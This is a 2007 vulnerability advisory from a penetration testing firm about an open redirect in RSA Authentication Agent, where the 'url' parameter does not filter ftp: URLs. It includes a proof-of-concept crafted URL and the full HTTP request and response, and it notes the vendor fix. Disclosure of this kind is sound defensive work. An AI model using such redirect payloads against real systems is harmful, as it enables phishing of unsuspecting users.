New Banner 3

Services

Find out more about ProCheckUp's services including: Penetration Testing, PCI QSA and PCI ASV

PR07-43

PR07-43 - Cross-domain redirect on RSA Authentication Agent

ProCheckUp Labs

ProCheckUp Labs are dedicated to conducting research and raising the awareness of information security issues. The combination of ProCheckNet's response-driven AI technology and our experienced security consultants has led to the discovery of many security vulnerabilities and advisories during penetration testing assignments.

In 2008 ProCheckUp published more vulnerabilities than any other UK penetration testing company.

Over the years, ProCheckUp have been credited with finding vulnerabilities and advisories in products from vendors such as:  

Microsoft - Aruba Networks - IBM - Novell - BEA Systems - Whale Communications - Netscape - Hummingbird - Apache- F5 Networks - GoAhead - Sun Microsystems

Advisories (Vulnerabilities) & Papers

Vulnerability found:
05 December 2007
Vendor informed:
13 December 2007
Severity level:
Low/Medium
Credits:
Richard Brain of ProCheckUp Ltd (www.procheckup.com). ProCheckUp thanks RSA for being so cooperative and responding so fast.
Description:
A remote URI redirection vulnerability affects the RSA Authentication Agent. This issue is due to a failure of the application to properly sanitize URI-supplied data assigned to the 'url' parameter.

An attacker may leverage this issue to carry out convincing phishing attacks against unsuspecting users by causing an arbitrary page to be loaded once a RSA Authentication Agent specially-crafted URL is visited.

Although the 'url' parameter is filtered for protocol URLs such as 'http://' and 'https://', is NOT filtered for other protocols such as FTP or Gopher. An attacker could upload a spoof login page to a FTP server that allows anonymous connections where the victim would be redirected.

Vulnerable server-side program: '/WebID/IISWebAgentIF.dll'

Unfiltered parameter: 'url'

Consequences

Victim users can be redirected to third-party sites for the purpose of exploiting browser vulnerabilities or performing phishing attacks.

BID

28907

Note

the redirect will only take place in browsers which consider URLs with only one slash after the colon symbol ':' as valid when performing redirects - i.e.: "Location: ftp:/evil-domain.foo/"

Successfully tested on

RSA Authentication Agent 5.3.0.258 for Web for Internet Information Services in conjunction with Mozilla Firefox 2.0.0.11
Proof of concept:
Example of specially-crafted URL:

https://target/WebID/IISWebAgentIF.dll?Redirect?url=ftp://bo.mirror.garr.it/pub/mirrors/Mandrake/devel/cooker/i586/index.htm

COMPLETE HTTP REQUEST:

GET /WebID/IISWebAgentIF.dll?Redirect?url=ftp://bo.mirror.garr.it/pub/mirrors/Mandrake/devel/cooker/i586/index.htm HTTP/1.1
Host: target-domain.foo
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

COMPLETE HTTP RESPONSE:

HTTP/1.x 302 Object Moved
Connection: Keep-Alive
Content-Length: 194
Date: Tue, 18 Dec 2007 09:35:19 GMT
Location: ftp:/bo.mirror.garr.it/pub/mirrors/Mandrake/devel/cooker/i586/index.htm
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
How to fix:
The vendor has stated that this issue was addressed in the RSA Authentication Agent 5.3.3.378. RSA customers can download the upgrade from the RSA web site.
References:
http://www.procheckup.com/research/views/vulnerabilities

http://www.rsa.com/node.aspx?id=2807
Legal:
Copyright 2008 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.

Back to Vulnerabilities List